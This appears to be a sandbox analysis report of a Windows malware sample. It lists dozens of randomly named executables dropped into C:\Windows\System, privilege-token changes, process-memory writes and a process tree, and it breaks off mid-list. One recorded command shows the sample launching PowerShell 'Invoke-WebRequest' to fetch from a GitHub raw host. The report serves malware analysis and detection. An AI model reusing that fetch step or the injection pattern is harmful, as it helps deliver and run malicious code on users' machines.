File created C:\Windows\System\imoqMnf.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\zCbZmPa.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\jtiIgZd.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\pEmwMQF.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\RGYYkCy.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\XOaNwnf.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\ywkWnrD.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\cHKYDPs.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\CWBxxQP.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZMpPIaB.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\COVEfxM.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\wBMCFYe.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\LcEDkeO.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\wRNUsSB.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\UiNxhaY.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\PELxnjM.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\ybPYTNP.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\swGqbtb.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\inhxcZB.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\cyecVYZ.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\sUvORzG.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\kkFisvd.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\VYarsnQ.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\TfjqdaD.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\EUlieMk.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\tArBqrr.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\MujwDwh.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\NSPpMNe.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\QkDRCZK.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\qczUMPS.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\tIwOdKs.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\hKvNPYq.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\IdePnWZ.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\rIIWHrs.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\vopstbz.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\lEEJlzY.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\WuSFbrI.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\axQMDcr.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\LDRrcrV.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\GyspJkG.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\VLIMuAx.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\qxiiDzr.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\BKkGFEQ.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\IFIqCtP.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\lrzXjVy.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\lTEZJSS.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\RkaTLDL.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\FHmvWgo.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\YwAPwIO.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\CuqKdEJ.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\sCbkDOv.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\oaRcCyx.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\ghAbeoh.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\EmsgugK.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2620 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2620 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2620 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\OItciUL.exe
PID 2620 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\OItciUL.exe
PID 2620 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\jwyxaOe.exe
PID 2620 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\jwyxaOe.exe
PID 2620 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\eAlXBBG.exe
PID 2620 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\eAlXBBG.exe
PID 2620 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\SASkSSk.exe
PID 2620 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\SASkSSk.exe
PID 2620 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\KdYGnOH.exe
PID 2620 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\KdYGnOH.exe
PID 2620 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\peAIgRU.exe
PID 2620 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\peAIgRU.exe
PID 2620 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\mozikGz.exe
PID 2620 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\mozikGz.exe
PID 2620 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\xiltYGg.exe
PID 2620 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\xiltYGg.exe
PID 2620 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\PcruerW.exe
PID 2620 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\PcruerW.exe
PID 2620 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\ukjPsnF.exe
PID 2620 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\ukjPsnF.exe
PID 2620 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\HtEeppC.exe
PID 2620 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\HtEeppC.exe
PID 2620 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\RkaTLDL.exe
PID 2620 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\RkaTLDL.exe
PID 2620 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\enszcXd.exe
PID 2620 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\enszcXd.exe
PID 2620 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\OkJsYRo.exe
PID 2620 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\OkJsYRo.exe
PID 2620 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\YaKAOoP.exe
PID 2620 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\YaKAOoP.exe
PID 2620 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\ztgcCnT.exe
PID 2620 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\ztgcCnT.exe
PID 2620 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\Ulplwni.exe
PID 2620 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\Ulplwni.exe
PID 2620 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\rIIWHrs.exe
PID 2620 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\rIIWHrs.exe
PID 2620 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\lTotpOg.exe
PID 2620 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\lTotpOg.exe
PID 2620 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\yfNNjbg.exe
PID 2620 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\yfNNjbg.exe
PID 2620 wrote to memory of 440 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\qPmzhyd.exe
PID 2620 wrote to memory of 440 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\qPmzhyd.exe
PID 2620 wrote to memory of 732 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\sbvCWoC.exe
PID 2620 wrote to memory of 732 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\sbvCWoC.exe
PID 2620 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\wMkGpUg.exe
PID 2620 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\wMkGpUg.exe
PID 2620 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\JwZwQqw.exe
PID 2620 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\JwZwQqw.exe
PID 2620 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\PBUepdr.exe
PID 2620 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\PBUepdr.exe
PID 2620 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\CiOoxmx.exe
PID 2620 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\CiOoxmx.exe
PID 2620 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\axQMDcr.exe
PID 2620 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\axQMDcr.exe
PID 2620 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\knpZHZg.exe
PID 2620 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\knpZHZg.exe
PID 2620 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\wFVmnam.exe
PID 2620 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\wFVmnam.exe
PID 2620 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\IRmpEsL.exe
PID 2620 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\IRmpEsL.exe
PID 2620 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\LrbSXam.exe
PID 2620 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\LrbSXam.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\OItciUL.exe

C:\Windows\System\OItciUL.exe

C:\Windows\System\jwyxaOe.exe

C:\Windows\System\jwyxaOe.exe

C:\Windows\System\eAlXBBG.exe

C:\Windows\System\eAlXBBG.exe

C:\Windows\System\SASkSSk.exe

C:\Windows\System\SASkSSk.exe

C:\Windows\System\KdYGnOH.exe

C:\Windows\System\KdYGnOH.exe

C:\Windows\System\peAIgRU.exe

C:\Windows\System\peAIgRU.exe

C:\Windows\System\mozikGz.exe

C:\Windows\System\mozikGz.exe

C:\Windows\System\xiltYGg.exe

C:\Windows\System\xiltYGg.exe

C:\Windows\System\PcruerW.exe

C:\Windows\System\PcruerW.exe

C:\Windows\System\ukjPsnF.exe

C:\Windows\System\ukjPsnF.exe

C:\Windows\System\HtEeppC.exe

C:\Windows\System\HtEeppC.exe

C:\Windows\System\RkaTLDL.exe

C:\Windows\System\RkaTLDL.exe

C:\Windows\System\enszcXd.exe

C:\Windows\System\enszcXd.exe

C:\Windows\System\OkJsYRo.exe

C:\Windows\System\OkJsYRo.exe

C:\Windows\System\YaKAOoP.exe

C:\Windows\System\YaKAOoP.exe

C:\Windows\System\ztgcCnT.exe

C:\Windows\System\ztgcCnT.exe

C:\Windows\System\Ulplwni.exe

C:\Windows\System\Ulplwni.exe

C:\Windows\System\rIIWHrs.exe

C:\Windows\System\rIIWHrs.exe

C:\Windows\System\lTotpOg.exe

C:\Windows\System\lTotpOg.exe

C:\Windows\System\yfNNjbg.exe

C:\Windows\System\yfNNjbg.exe

C:\Windows\System\qPmzhyd.exe

C:\Windows\System\qPmzhyd.exe

C:\Windows\System\sbvCWoC.exe

C:\Windows\System\sbvCWoC.exe

C:\Windows\System\wMkGpUg.exe

C:\Windows\System\wMkGpUg.exe

C:\Windows\System\JwZwQqw.exe

C:\Windows\System\JwZwQqw.exe

C:\Windows\System\PBUepdr.exe

C:\Windows\System\PBUepdr.exe

C:\Windows\System\CiOoxmx.exe

C:\Windows\System\CiOoxmx.exe

C:\Windows\System\axQMDcr.exe

C:\Windows\System\axQMDcr.exe

C:\Windows\System\knpZHZg.exe

C:\Windows\System\knpZHZg.exe

C:\Windows\System\wFVmnam.exe

C:\Windows\System\wFVmnam.exe

C:\Windows\System\IRmpEsL.exe

C:\Windows\System\IRmpEsL.exe

C:\Windows\System\LrbSXam.exe

C:\Windows\System\LrbSXam.exe

C:\Windows\System\DQRkYmL.exe

C:\Windows\System\DQRkYmL.exe

C:\Windows\System\TIiRTUd.exe

C:\Windows\System\TIiRTUd.exe

C:\Windows\System\XjgOwvY.exe

C:\Windows\System\XjgOwvY.exe

C:\Windows\System\EPQTmVe.exe

C:\Windows\System\EPQTmVe.exe

C:\Windows\System\akBxHIv.exe

C:\Windows\System\akBxHIv.exe

C:\Windows\System\rmsUOPH.exe

C:\Windows\System\rmsUOPH.exe

C:\Windows\System\yByfLMa.exe

C:\Windows\System\yByfLMa.exe

C:\Windows\System\xysXhgw.exe

C:\Windows\System\xysXhgw.exe

C:\Windows\System\RxQFrzF.exe

C:\Windows\System\RxQFrzF.exe

C:\Windows\System\zXREJLM.exe

C:\Windows\System\zXREJLM.exe

C:\Windows\System\ruaACot.exe

C:\Windows\System\ruaACot.exe

C:\Windows\System\KBxToBQ.exe

C:\Windows\System\KBxToBQ.exe

C:\Windows\System\ZmAXseT.exe

C:\Windows\System\ZmAXseT.exe

C:\Windows\System\szyqmfl.exe

C:\Windows\System\szyqmfl.exe

C:\Windows\System\UcGndDg.exe

C:\Windows\System\UcGndDg.exe

C:\Windows\System\RpKkntC.exe

C:\Windows\System\RpKkntC.exe

C:\Windows\System\xyijXCw.exe

C:\Windows\System\xyijXCw.exe

C:\Windows\System\BKkGFEQ.exe

C:\Windows\System\BKkGFEQ.exe

C:\Windows\System\CXhclEA.exe

C:\Windows\System\CXhclEA.exe

C:\Windows\System\sosHzdy.exe

C:\Windows\System\sosHzdy.exe

C:\Windows\System\nNjPQKg.exe

C:\Windows\System\nNjPQKg.exe

C:\Windows\System\lXXOnGM.exe

C:\Windows\System\lXXOnGM.exe

C:\Windows\System\lmblIbw.exe

C:\Windows\System\lmblIbw.exe

C:\Windows\System\agtzoUj.exe

C:\Windows\System\agtzoUj.exe

C:\Windows\System\pzUqDPz.exe

C:\Windows\System\pzUqDPz.exe

C:\Windows\System\LDRrcrV.exe

C:\Windows\System\LDRrcrV.exe

C:\Windows\System\TYtBVtv.exe

C:\Windows\System\TYtBVtv.exe

C:\Windows\System\CoNOCCo.exe

C:\Windows\System\CoNOCCo.exe

C:\Windows\System\QFAUJaN.exe

C:\Windows\System\QFAUJaN.exe

C:\Windows\System\HWbupuf.exe

C:\Windows\System\HWbupuf.exe

C:\Windows\System\gnfJvaa.exe

C:\Windows\System\gnfJvaa.exe

C:\Windows\System\wXYeIXN.exe

C:\Windows\System\wXYeIXN.exe

C:\Windows\System\OwFoqEH.exe

C:\Windows\System\OwFoqEH.exe

C:\Windows\System\BrMoZCn.exe

C:\Windows\System\BrMoZCn.exe

C:\Windows\System\sPyXadS.exe

C:\Windows\System\sPyXadS.exe

C:\Windows\System\DEXlUUu.exe

C:\Windows\System\DEXlUUu.exe

C:\Windows\System\WyQCsoV.exe

C:\Windows\System\WyQCsoV.exe

C:\Windows\System\YYQIXHa.exe

C:\Windows\System\YYQIXHa.exe

C:\Windows\System\UCBEWYh.exe

C:\Windows\System\UCBEWYh.exe

C:\Windows\System\hPYTWTk.exe

C:\Windows\System\hPYTWTk.exe

C:\Windows\System\RUZzwed.exe

C:\Windows\System\RUZzwed.exe

C:\Windows\System\RhVslao.exe

C:\Windows\System\RhVslao.exe

C:\Windows\System\dbJNEye.exe

C:\Windows\System\dbJNEye.exe

C:\Windows\System\GhFAGDX.exe

C:\Windows\System\GhFAGDX.exe

C:\Windows\System\jrQziZj.exe

C:\Windows\System\jrQziZj.exe

C:\Windows\System\wRNUsSB.exe

C:\Windows\System\wRNUsSB.exe

C:\Windows\System\fgMtkkp.exe

C:\Windows\System\fgMtkkp.exe

C:\Windows\System\IFIqCtP.exe

C:\Windows\System\IFIqCtP.exe

C:\Windows\System\JFhzRZj.exe

C:\Windows\System\JFhzRZj.exe

C:\Windows\System\BkkHGEp.exe

C:\Windows\System\BkkHGEp.exe

C:\Windows\System\NSlgGqe.exe

C:\Windows\System\NSlgGqe.exe

C:\Windows\System\vYZWQDb.exe

C:\Windows\System\vYZWQDb.exe

C:\Windows\System\yyqXFJt.exe

C:\Windows\System\yyqXFJt.exe

C:\Windows\System\BKmpzPR.exe

C:\Windows\System\BKmpzPR.exe

C:\Windows\System\IXpIdFh.exe

C:\Windows\System\IXpIdFh.exe

C:\Windows\System\BUrqmRj.exe

C:\Windows\System\BUrqmRj.exe

C:\Windows\System\GEXXzjP.exe

C:\Windows\System\GEXXzjP.exe

C:\Windows\System\nboErfX.exe

C:\Windows\System\nboErfX.exe

C:\Windows\System\AOmwRbE.exe

C:\Windows\System\AOmwRbE.exe

C:\Windows\System\LJbMHIy.exe

C:\Windows\System\LJbMHIy.exe

C:\Windows\System\QTdZZCv.exe

